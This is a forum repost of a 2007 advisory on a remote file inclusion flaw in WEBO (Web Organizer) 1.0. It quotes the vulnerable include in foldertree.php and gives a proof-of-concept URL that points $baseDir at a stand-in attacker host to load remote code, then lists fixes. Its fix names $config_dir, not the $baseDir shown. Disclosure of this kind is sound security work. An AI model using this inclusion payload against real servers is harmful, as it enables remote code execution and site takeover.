Ras Posted May 10, 2007 Report Posted May 10, 2007 Author : M.Hasran AddahroniWeb : [url]http://echo.or.id/adv/adv67-K-159-2007.txt[/url]Critical Lvl : DangerousAffected software description:~~~~~~~~~~~~~~~~~~~~~~~~~~~Application : WEBO (Web Organizer)version : 1.0Vendor : [url]http://sourceforge.net/projects/weborganizer/[/url]Description :WEBO (Web Organizer) is an open-source Web application suite providing a groupware calendar, a personal address book, a shared contacts directory, and a personal desktop page.---------------------------------------------------------------------------Vulnerability:~~~~~~~~~~~~~- Invalid include function at modules/abook/foldertree.php :---------------foldertree.php--------------------------------------<?php/* memento : TreeFolder( $label, $url="", $target="", $icon = "", $id="", $options="" ) TreeItem( $label, $url, $target="", $icon="", $options="" )*/include_once( "$baseDir/lib/HTML/tree.php");...------------------------------------------------------------------Variables $baseDir are not properly sanitized.When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.Poc/Exploit:~~~~~~~~~[url]http://www.target.com/[/url][webo_path]/modules/abook/foldertree.php?baseDir==http://attacker.com/evil?Solution:~~~~~~- Sanitize variable $config_dir on affected files.- Turn off register_globals--------------------------------------------------------------------------- Quote
